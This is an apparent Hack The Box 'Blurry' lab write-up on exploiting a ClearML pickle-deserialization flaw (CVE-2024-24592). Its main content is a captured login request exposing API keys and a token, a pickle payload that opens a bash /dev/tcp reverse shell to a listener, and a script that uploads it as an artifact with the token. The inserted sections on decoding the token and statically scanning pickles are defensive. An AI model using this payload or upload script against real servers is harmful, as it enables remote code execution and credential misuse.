[season-5] Box Blurry: a record of a failed attempt at user


https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

There is no public exploit for CVE-2024-24592.

Using the upload method from the original article, I could only put the pkl into my own directory. I saw that other people apparently had something that runs every five minutes, so I captured the traffic to take a look.

```http
GET /auth.login HTTP/1.1
Host: api.blurry.htb
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-ClearML-Worker: flower
X-Trains-Worker: flower
X-ClearML-Client: clearml-1.16.1
X-Trains-Client: clearml-1.16.1
Authorization: Basic TkJEMjFLNkdHRFdLN09RUjdWWVI6bDZQUnRZU21naE81VzI4cWNIcmxUZk52RXBnZFpoeURaaW82NzlYNG9mc3ZFeElpdTA=

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 09 Jun 2024 09:20:26 GMT
Content-Type: application/json
Content-Length: 561
Connection: keep-alive
Set-Cookie: clearml_token_basic=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjA1MTY4MjYsImlkZW50aXR5Ijp7InJvbGUiOiJ1c2VyIiwidXNlciI6IjRkNWYxMWY5NDBlZTRlMmE4NDFlMTY1OGQ5NzAxYWQ5IiwiY29tcGFueV9uYW1lIjoiY2xlYXJtbCIsImNvbXBhbnkiOiJkMWJkOTJhM2IwMzk0MDBjYmFmYzYwYTdhNWIxZTUyYiIsInVzZXJfbmFtZSI6InRlc3QifSwiZW52IjoiPHVua25vd24-IiwiaWF0IjoxNzE3OTI0ODI2LCJhdXRoX3R5cGUiOiJCZWFyZXIiLCJhcGlfdmVyc2lvbiI6IjIuMjciLCJzZXJ2ZXJfdmVyc2lvbiI6IjEuMTMuMSIsInNlcnZlcl9idWlsZCI6IjQyNiIsImZlYXR1cmVfc2V0IjoiYmFzaWMifQ.HTLTGznaGeTwLHRIr6m0mDsr17Leem3-iFrGitdln5M; Expires=Sat, 24 Apr 5193 19:07:05 GMT; Max-Age=99999999999; HttpOnly; Path=/
Vary: Accept-Encoding
Content-Encoding: gzip

{"meta":{"id":"3295e0caffee469a84f4328a43d4aa8d","trx":"3295e0caffee469a84f4328a43d4aa8d","endpoint":{"name":"auth.login","requested_version":"2.27","actual_version":"1.0"},"result_code":200,"result_subcode":0,"result_msg":"OK","error_stack":"","error_data":{}},"data":{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjA1MTY4MjYsImlkZW50aXR5Ijp7InJvbGUiOiJ1c2VyIiwidXNlciI6IjRkNWYxMWY5NDBlZTRlMmE4NDFlMTY1OGQ5NzAxYWQ5IiwiY29tcGFueV9uYW1lIjoiY2xlYXJtbCIsImNvbXBhbnkiOiJkMWJkOTJhM2IwMzk0MDBjYmFmYzYwYTdhNWIxZTUyYiIsInVzZXJfbmFtZSI6InRlc3QifSwiZW52IjoiPHVua25vd24-IiwiaWF0IjoxNzE3OTI0ODI2LCJhdXRoX3R5cGUiOiJCZWFyZXIiLCJhcGlfdmVyc2lvbiI6IjIuMjciLCJzZXJ2ZXJfdmVyc2lvbiI6IjEuMTMuMSIsInNlcnZlcl9idWlsZCI6IjQyNiIsImZlYXR1cmVfc2V0IjoiYmFzaWMifQ.HTLTGznaGeTwLHRIr6m0mDsr17Leem3-iFrGitdln5M"}}
```

The token it returns can be used directly. The Basic value in the request is just the base64 of the two authentication values the web UI handed out:

```python
os.environ['CLEARML_API_ACCESS_KEY'] = 'NBD21K6GGDWK7OQR7VYR'
os.environ['CLEARML_API_SECRET_KEY'] = 'l6PRtYSmghO5W28qcHrlTfNvEpgdZhyDZio679X4ofsvExIiu0'
```

```shell
└─$ echo 'TkJEMjFLNkdHRFdLN09RUjdWWVI6bDZQUnRZU21naE81VzI4cWNIcmxUZk52RXBnZFpoeURaaW82NzlYNG9mc3ZFeElpdTA='|base64 -d
NBD21K6GGDWK7OQR7VYR:l6PRtYSmghO5W28qcHrlTfNvEpgdZhyDZio679X4ofsvExIiu0
```
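Before reusing a captured token it is worth reading what it actually grants and for how long. The example below is added here and is not part of the original post or of ClearML: it decodes the header and claims of the JWT from the capture above (the token string and the cookie's `Max-Age=99999999999` are taken from the page; nothing is verified, since the HS256 key only exists on the server) and compares the token's own lifetime against the cookie lifetime the server set.

```python
import base64
import json
from datetime import datetime, timezone

# Bearer token returned by auth.login in the capture above (copied from the page).
CAPTURED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJleHAiOjE3MjA1MTY4MjYsImlkZW50aXR5Ijp7InJvbGUiOiJ1c2VyIiwidXNlciI6IjRkNWYxMWY5NDBlZTRlMmE4NDFlMTY1OGQ5NzAxYWQ5IiwiY29tcGFueV9uYW1lIjoiY2xlYXJtbCIsImNvbXBhbnkiOiJkMWJkOTJhM2IwMzk0MDBjYmFmYzYwYTdhNWIxZTUyYiIsInVzZXJfbmFtZSI6InRlc3QifSwiZW52IjoiPHVua25vd24-IiwiaWF0IjoxNzE3OTI0ODI2LCJhdXRoX3R5cGUiOiJCZWFyZXIiLCJhcGlfdmVyc2lvbiI6IjIuMjciLCJzZXJ2ZXJfdmVyc2lvbiI6IjEuMTMuMSIsInNlcnZlcl9idWlsZCI6IjQyNiIsImZlYXR1cmVfc2V0IjoiYmFzaWMifQ."
    "HTLTGznaGeTwLHRIr6m0mDsr17Leem3-iFrGitdln5M"
)
# Max-Age of the clearml_token_basic cookie in the Set-Cookie header above.
COOKIE_MAX_AGE_SECONDS = 99999999999


def _b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without padding. Restore the '=' padding first;
    plain base64.b64decode would also reject the '-' that encodes '<unknown>' here."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str) -> tuple[dict, dict]:
    """Return (header, claims). This only parses the token; it does NOT verify it."""
    header_b64, payload_b64, _signature_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    claims = json.loads(_b64url_decode(payload_b64))
    return header, claims


def token_lifetime_days(claims: dict) -> float:
    """Validity window the issuer encoded in the token itself."""
    return (claims["exp"] - claims["iat"]) / 86400


def cookie_outlives_token(claims: dict, max_age_seconds: int) -> bool:
    """True when the browser will keep presenting the cookie long after exp has passed."""
    return max_age_seconds > claims["exp"] - claims["iat"]


def summarize(token: str) -> dict:
    """Compact view of what a captured token is worth to whoever holds it."""
    header, claims = decode_jwt(token)
    return {
        "alg": header["alg"],
        "role": claims["identity"]["role"],
        "user_name": claims["identity"]["user_name"],
        "company_name": claims["identity"]["company_name"],
        "issued": datetime.fromtimestamp(claims["iat"], tz=timezone.utc).isoformat(),
        "expires": datetime.fromtimestamp(claims["exp"], tz=timezone.utc).isoformat(),
        "lifetime_days": token_lifetime_days(claims),
        "cookie_outlives_token": cookie_outlives_token(claims, COOKIE_MAX_AGE_SECONDS),
    }


if __name__ == "__main__":
    for key, value in summarize(CAPTURED_TOKEN).items():
        print(f"{key}: {value}")
```

The `iat` claim decodes to the same instant as the response's `Date` header, which is a quick sanity check that the capture and the token belong together. The token is valid for 30 days, while the cookie carrying it is set to live for roughly 3,000 years, so the server, not the browser, is the only place the expiry is enforced.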

But since the capture already gave me one, I'll just use it directly... I'm not picky.

Then I wrote my script.

First, the deserialization payload:

```python
import pickle
import os

class RunCommand:
    # Unpickling calls the callable returned by __reduce__ with the given arguments;
    # here that is os.system with a reverse-shell command (the author's placeholders
    # 10.10.16.xx and xxx stand for the listener address and port).
    def __reduce__(self):
        return (os.system, ('/bin/bash -i >& /dev/tcp/10.10.16.xx/xxx 0>&1',))

command = RunCommand()

# Serialize the object; the command runs when the file is pickle.load()ed.
with open("revshell.pkl", 'wb') as f:
    pickle.dump(command, f)
```
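The payload works because unpickling executes whatever callable `__reduce__` names, which is exactly why a pipeline that auto-loads artifacts every few minutes is dangerous. The same property gives a defender two handles, shown in the added example below (not code from the original post or from ClearML): a static scan that lists every global a pickle stream references without executing it, using `pickletools` to walk the `GLOBAL` and `STACK_GLOBAL` opcodes, and an allowlist `Unpickler` whose `find_class` refuses anything else. The allowlist, the sample artifacts, and the use of `print` as a harmless stand-in for the `os.system` call above are all constructed for this example.

```python
import io
import pickle
import pickletools

# Constructed allowlist: the (module, name) globals a legitimate artifact made of plain
# Python containers may reference. A real deployment would list its own model classes.
ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "set"),
    ("collections", "OrderedDict"),
}

# Opcodes that push a string; STACK_GLOBAL (protocol 4+) takes its operands from these.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


class ArtifactWithSideEffect:
    """Constructed sample: unpickling it calls print(), a harmless stand-in for the
    os.system call in the payload above. The mechanism is identical."""

    def __reduce__(self):
        return (print, ("side effect ran during load",))


def scan_pickle(data: bytes) -> list[tuple[str, str]]:
    """List every (module, name) global the stream references, in order, without
    executing it: pickletools.genops only disassembles opcodes.

    GLOBAL (protocols 0-3) carries "module name" in its argument. STACK_GLOBAL
    (protocol 4+) pops module and name from the stack, so the two most recent string
    pushes are tracked, including strings fetched back from the memo.
    """
    found: list[tuple[str, str]] = []
    strings: list[str] = []   # every string pushed so far, in stream order
    memo: dict = {}            # memo slot -> string (None for non-string objects)
    memoize_count = 0          # MEMOIZE assigns slots sequentially
    last_value = None          # string pushed by the immediately preceding opcode
    for op, arg, pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(strings) < 2:
                raise ValueError(f"STACK_GLOBAL at offset {pos} lacks string operands")
            found.append((strings[-2], strings[-1]))
        elif op.name in STRING_OPS:
            strings.append(arg)
            last_value = arg
            continue           # keep last_value for a following PUT/MEMOIZE
        elif op.name == "MEMOIZE":
            memo[memoize_count] = last_value
            memoize_count += 1
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last_value
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            value = memo.get(arg)
            if isinstance(value, str):
                strings.append(value)
                last_value = value
                continue
        last_value = None
    return found


def triage(data: bytes) -> tuple[bool, list[tuple[str, str]]]:
    """(is_clean, globals outside the allowlist), decided statically."""
    disallowed = [g for g in scan_pickle(data) if g not in ALLOWED_GLOBALS]
    return (not disallowed, disallowed)


class AllowlistUnpickler(pickle.Unpickler):
    """Mitigation for when loading is unavoidable: find_class is consulted for every
    global before it is used, so a disallowed callable is never resolved, let alone
    invoked by REDUCE."""

    def find_class(self, module: str, name: str):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")
        return super().find_class(module, name)


def safe_load(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


def load_is_refused(data: bytes) -> bool:
    """True when the allowlist unpickler rejects the stream."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


def build_samples() -> dict[str, bytes]:
    """Constructed inputs: a benign artifact and the side-effect object at two
    protocols, so both the GLOBAL and the STACK_GLOBAL paths are exercised."""
    benign = {"weights": [0.1, 0.2, 0.3], "labels": {"cat", "dog"}}
    return {
        "benign_p3": pickle.dumps(benign, protocol=3),                          # set -> GLOBAL
        "suspicious_p3": pickle.dumps(ArtifactWithSideEffect(), protocol=3),   # GLOBAL
        "suspicious_p4": pickle.dumps(ArtifactWithSideEffect(), protocol=4),   # STACK_GLOBAL
    }


if __name__ == "__main__":
    for label, blob in build_samples().items():
        clean, bad = triage(blob)
        print(f"{label}: globals={scan_pickle(blob)} clean={clean} "
              f"refused_on_load={load_is_refused(blob)}")
```

The static scan is the check to run on artifacts at upload or before a scheduled job touches them; the allowlist unpickler is the fallback for the loader itself. Neither relies on signatures of known payloads, only on the fact that a data-only artifact has no business referencing `os`, `subprocess`, `builtins.print` or anything else outside its expected types.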
```python
import base64
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder


url = 'http://files.blurry.htb/'

# Multipart body: the field name is the artifact path on the file server,
# the value is the local payload file.
multipart_data = MultipartEncoder(
    fields={
        '/Black Swan/Review JSON Artifacts.e49866199ce645538b859bf17b086c39/artifacts/pickle_artifact/pickle_artifact.pkl': (
            'pickle_artifact.pkl',
            open('./revshell', 'rb').read(),  # this is my file
            'binary/octet-stream'
        )
    }
)

headers = {
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    # Bearer token taken from the auth.login response captured above
    'Authorization': 'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjA1MTY4MjYsImlkZW50aXR5Ijp7InJvbGUiOiJ1c2VyIiwidXNlciI6IjRkNWYxMWY5NDBlZTRlMmE4NDFlMTY1OGQ5NzAxYWQ5IiwiY29tcGFueV9uYW1lIjoiY2xlYXJtbCIsImNvbXBhbnkiOiJkMWJkOTJhM2IwMzk0MDBjYmFmYzYwYTdhNWIxZTUyYiIsInVzZXJfbmFtZSI6InRlc3QifSwiZW52IjoiPHVua25vd24-IiwiaWF0IjoxNzE3OTI0ODI2LCJhdXRoX3R5cGUiOiJCZWFyZXIiLCJhcGlfdmVyc2lvbiI6IjIuMjciLCJzZXJ2ZXJfdmVyc2lvbiI6IjEuMTMuMSIsInNlcnZlcl9idWlsZCI6IjQyNiIsImZlYXR1cmVfc2V0IjoiYmFzaWMifQ.HTLTGznaGeTwLHRIr6m0mDsr17Leem3-iFrGitdln5M',
    'Content-Type': multipart_data.content_type
}
# Send once directly, then once more through the local proxy to inspect the exchange.
requests.post(url, headers=headers, data=multipart_data)
resp = requests.post(url, headers=headers, data=multipart_data, proxies={"http": "127.0.0.1:8080"})

print(resp.text)
```